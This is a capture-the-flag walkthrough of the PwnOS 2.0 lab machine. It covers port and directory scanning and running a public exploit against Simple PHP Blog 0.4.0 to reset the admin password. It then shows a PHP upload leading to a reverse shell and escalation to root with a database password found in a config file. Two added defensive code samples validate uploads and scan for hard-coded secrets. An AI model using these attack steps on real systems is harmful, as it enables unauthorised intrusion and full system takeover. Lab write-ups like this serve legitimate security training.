
PWNOS2.0 Walkthrough

Reconnaissance

Port Scanning

┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -F 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:52 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds

Enumeration

HTTP Enumeration

Port 80 is open, so we brute-force directories with dirb.

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100 | grep "=="
==> DIRECTORY: http://10.10.10.100/blog/
==> DIRECTORY: http://10.10.10.100/includes/
==> DIRECTORY: http://10.10.10.100/blog/config/
==> DIRECTORY: http://10.10.10.100/blog/content/
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
==> DIRECTORY: http://10.10.10.100/blog/scripts/
==> DIRECTORY: http://10.10.10.100/blog/themes/

Visiting http://10.10.10.100/blog takes us to a blog page. Viewing the page source shows that the application is Simple PHP Blog 0.4.0.

    <meta name="generator" content="Simple PHP Blog 0.4.0" />

Searching with searchsploit turns up a "Multiple Remote" exploit entry for this version.

┌──(kali㉿kali)-[~]
└─$ searchsploit simple PHP 0.4
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                           | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                      | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities               | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                                  | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                              | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command Execution                                                         | php/webapps/1581.pl

Exploitation

We use 1191.pl against it.

┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

Log in with the username and password that were just set.

The blog has an image upload feature; we try whether it can be abused.

The upload succeeds. With a listener running on the attacking machine, requesting the uploaded PHP file gives us a reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown host
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 44078
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 20:00:24 up  4:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
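As an added example (not part of the original walkthrough or of Simple PHP Blog), this is the server-side check that would have stopped the foothold above: the blog accepted a PHP file through its image upload and then served it from a directory where PHP executes. The validator assumes a hypothetical upload handler and uses constructed sample files, not real uploads from the target.

```python
import os
import secrets

# Allowed extensions and the file signature (magic bytes) each must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def validate_image_upload(client_name: str, data: bytes) -> str:
    """Validate an upload and return the name the server will store it under.

    Checks, in order: exactly one allow-listed extension (so "shell.php" and
    "shell.php.png" both fail), a matching image signature, and no PHP open
    tag anywhere in the body (a valid PNG with PHP appended still fails).
    """
    base = os.path.basename(client_name).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("filename must have exactly one extension")
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("PHP open tag found inside image data")
    # Never keep the client-supplied name: random name, server-chosen extension.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(client_name: str, data: bytes) -> bool:
    """Boolean wrapper around the validator, convenient for tests and logging."""
    try:
        validate_image_upload(client_name, data)
        return True
    except UploadRejected:
        return False


# Constructed samples (hypothetical, not files from the target).
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_AS_PNG = b"<?php echo 'x'; ?>"            # PHP body submitted under a .png name
PNG_WITH_PHP = PNG_OK + b"<?php echo 'x'; ?>"  # valid header, PHP appended
```

Content checks are defence in depth only; the upload directory must also be one where the server never executes scripts (for mod_php, `php_admin_flag engine off` in that directory's Apache configuration).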

Privilege Escalation

Under /var there is a file named mysqli_connect.php; we take a look at it.

$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>
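As an added audit example (not from the original post), a small scanner for the two weaknesses this file exposes: database credentials hard-coded in a PHP file that the web server account can read, and a password that is then worth trying against system accounts. It assumes a hypothetical webroot and runs over a constructed copy of the connect script rather than the target itself.

```python
import re
import stat
from pathlib import Path

# Matches define('DB_PASSWORD', '...') / DEFINE ("DB_PASS", "...") style constants
# whose name suggests a secret; DB_USER and DB_HOST are deliberately not matched.
CRED_RE = re.compile(
    r'define\s*\(\s*[\'"](?P<name>\w*(?:PASS|SECRET|TOKEN)\w*)[\'"]\s*,'
    r'\s*[\'"](?P<value>[^\'"]*)[\'"]',
    re.IGNORECASE,
)


def find_hardcoded_secrets(php_source: str) -> list[dict]:
    """Return one finding per secret-looking define() in the PHP source."""
    findings = []
    for m in CRED_RE.finditer(php_source):
        value = m.group("value")
        findings.append({
            "name": m.group("name"),
            "length": len(value),
            # Masked preview so the report itself never leaks the secret.
            "preview": value[:2] + "*" * max(len(value) - 2, 0),
        })
    return findings


def world_readable(path: Path) -> bool:
    """True if any local user can read the file (what let www-data read it here)."""
    return bool(path.stat().st_mode & stat.S_IROTH)


def audit_webroot(webroot: Path) -> list[dict]:
    """Walk a webroot and report PHP files that carry hard-coded secrets."""
    report = []
    for php in webroot.rglob("*.php"):
        try:
            found = find_hardcoded_secrets(php.read_text(errors="replace"))
        except OSError:
            continue  # unreadable or vanished file; nothing to report
        if found:
            report.append({"file": str(php),
                           "world_readable": world_readable(php),
                           "secrets": found})
    return report


# Constructed sample based on the connect script shown in the walkthrough.
SAMPLE = """<?php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
?>"""
```

Any secret this reports should be assumed reused until checked; rotating the database password alone would not have helped on this box, because the same string was also the root account's password.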

Using the password just recovered, we switch to the root user.

# This command uses the spawn function from Python's pty module to start a proper interactive Bash shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@web:/var$ su root
su root
Password: root@ISIntS
root@web:/var# id
id
uid=0(root) gid=0(root) groups=0(root)


This post is licensed under CC BY 4.0 by the author.
